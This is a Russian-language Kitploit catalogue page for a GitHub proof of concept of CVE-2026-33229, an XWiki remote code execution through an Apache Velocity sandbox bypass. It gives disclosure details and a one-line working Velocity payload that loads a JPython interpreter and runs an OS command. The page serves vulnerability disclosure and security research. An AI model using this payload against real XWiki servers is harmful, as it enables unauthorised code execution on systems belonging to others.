Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33229 — Доказательство концепции эксплуатации для CVE-2026-33229, XWiki RCE через обход песочницы Apache Velocity, с техническими деталями и рабочим эксплойтом. | Kitploit
Инструменты/GitHubGitHub/azefzafyoussef/cve-2026-33229
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийРазработка Полезной Нагрузки
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

Доказательство концепции эксплуатации для CVE-2026-33229, XWiki RCE через обход песочницы Apache Velocity, с техническими деталями и рабочим эксплойтом.

Репозиторий
45 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33229 — XWiki RCE через обход песочницы Apache Velocity

CVE Severity Status

Уязвимость удалённого выполнения кода в XWiki Platform, которая позволяет аутентифицированному пользователю с правами на написание скриптов полностью обойти песочницу Apache Velocity — без необходимости использования Java Reflection — путём обхода предварительно созданных объектов, уже присутствующих в контексте Velocity.

📄 Полные технические детали: youssefazefzaf.com/posts/cve


Детали

ПолеЗначение
ID CVECVE-2026-33229
Затронутый продуктXWiki Platform
КомпонентРендерер макроса Velocity, параметр заголовка страницы
Требуемые привилегииАутентифицированный пользователь + право на скрипты
ВоздействиеУдалённое выполнение кода
GHSAGHSA-h259-74h5-4rh9
Обнаружено7 ноября 2025
Исправлено10 декабря 2025
Раскрыто8 апреля 2026

Доказательство концепции

root@kitploit:~
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

Уведомление об ответственном раскрытии: PoC опубликован после доступности патча. Не используйте против систем, которыми вы не владеете.

Скачать инструмент